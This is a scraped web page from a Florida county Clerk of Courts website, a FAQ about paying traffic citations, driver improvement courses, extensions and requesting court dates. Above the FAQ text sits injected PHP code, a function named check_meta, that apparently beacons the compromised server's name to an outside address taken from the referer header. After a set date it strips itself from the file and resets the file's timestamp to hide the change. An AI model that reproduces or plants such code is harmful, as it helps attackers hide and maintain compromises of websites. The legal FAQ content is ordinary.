check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456736233){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/modules/mod_banners/models.php"); } Traffic Infraction FAQ's
Home Traffic Infraction FAQ's

More... Quick Links

Traffic Infractions Frequently Asked Questions
  Toggle all descriptions Collapse all descriptions
Frequently Asked Questions (Click to sort)
What are my options?

You have 30 calendar days from the date you received a citation to select one of the following options:

  • Pay the fine.
  • Attend a Driver Improvement Course and prevent points from being assessed against
    your license.
  • Apply for a 30 day extension to pay the fine.
  • Request a Court date.
Where can I pay my traffic citation?

Payment must be made in person or by mail at the Clerk of Courts, Traffic Division in the County the
Citation was received. All citations must be paid within 30 days.

You can also pay your citation online at:

Note: Not all fines are payable online. See question below for a list of exceptions.

How do I elect to attend the Driver Improvement Course?

If you have not elected to attend defensive driving school 5 times in the past 10 years and have not
attended in the last 12 months, you are eligible for 4-hour defensive driving school. You are NOT
eligible for the class if you have a commercial driver's license.

If you are cited for an infraction that does not require a mandatory Court appearance, you may be able
to prevent points from being assessed against your license by electing to attend a defensive driving
course. You must notify the Traffic Division when you make your payment and file a Traffic School
. Fine amounts are located on our Fee Schedule page. Upon filing the Affidavit, you must
register with a driving school licensed in the State of Florida,attend the class, and return Proof of
Completion within 60 days from the date you paid your citation. Extensions of time to complete the
defensive driving course are not allowed.

It is your responsibility to enroll in a traffic school. For information on how to find a Driver Improvement
Course see below. Enrollment fees must be paid to the Traffic Schools; do not remit enrollment fees
to the Clerk's Office with your fine payment.

You must pay your fine and complete the Affidavit to attend school within 30 calendar days from the
date you received your citation, or your driver's license may be suspended and additional delinquent
fees must be submitted. If your license becomes suspended additional costs will be required in order
for you to get your driver's license reinstated.

Where can I find information on Driver Improvement Courses?
  • Refer to the yellow pages of your Local phone directory.
  • Search the Web for "Traffic Improvement" and find courses available to take online.
  • You can obtain more information and search for Driver Improvement Courses at the
    Florida Highway Safety and Motor Vehicles website.
What happens if I fail to attend the Driver Improvement Course?

If you fail to complete the course and return the certificate of completion to the Traffic Division within
60 days, you will be subject to the following penalties:

  • Your driver's license will be suspended by the State of Florida.
  • You forfeit one of your 5 lifetime elections.
  • You must pay the balance of the fine, plus a late fee, and possibly a $60.00 driver's
    license reinstatement fee.
  • Points will be assessed on your driving record.
Where do I send my completion of driving school?

It is your responsibility to send the proof of completion and ensure that it has been received.

At any time before 60 days from the date you paid your citation, you may choose to mail, fax, or deliver
a copy of the traffic school completion to the Traffic Division.

Can I get an extension of time to pay?

If you are unable to pay the fine within 30 days of the issuance of the citation, you may contact the Traffic
prior to the 30 days elapsing in person or in writing to determine if you are eligible for a 30 day
extension. You will need to fill out a 30 Day Extension form.

How do I request a court date for a Traffic citation?

If you wish to contest the citation you must request a Court date in writing within thirty (30) days of the
issuance date of your citation. The request must be sent to the Traffic Division and include your name,
citation number, phone number, and your correct mailing address.

You can fill out the Not Guilty Plea form on our website. A Court date will be mailed to the address listed
on the citation unless your request includes an address change.

What types of violations are not payable through the internet?

The following violations are not payable through the Internet because fees vary according to the type of
violation. The defendant must take payment to a location or send payment through the mail.

  • Boat Speeding violations
  • Fishing, Hunting, or Trapping violations
  • Marine violations
  • Misdemeanors that do not require a Court appearance
  • Municipal ordinances that do not require a Court appearance
  • Saltwater Fishing License violations
  • Accident cases with a severity of Fatality or Serious Bodily Injury may not be paid for
    through the Internet unless the case has been to Court and fines/costs were
    assessed. A Court appearance is mandatory for these types of violations.
  • Driver's License, Registration, or Insurance violations
What if I have been charged with a Driver's License, Registration or Insurance violation?
  • If you have been ticketed by law enforcement for failure to carry or display a driver's
    license, vehicle registration or proof of insurance and you have valid documentation,
    (valid documentation means that the issue date of your license, registration or insurance
    was prior to the issue date of the ticket), you may forward the cost of the dismissal fee,
    the yellow copy of the ticket and a photocopy of your valid document and the charge will
    be dismissed by a Clerk in the Traffic Division. Fine amounts are located on our Fee
  • If your Driver's License, Registration, Tag, or Insurance was expired you must pay the
    fine amount due. Submit this fine payment with a photocopy of the renewed License,
    Registration or Insurance documentation.
Copyright © 2018 Clerk of Courts. All Rights Reserved.
Joomla! is Free Software released under the GNU/GPL License.
To protect your privacy, please read the Putnam County Email Privacy Policy.

Information on this website does not constitute the Official Court Records maintained by the Clerk.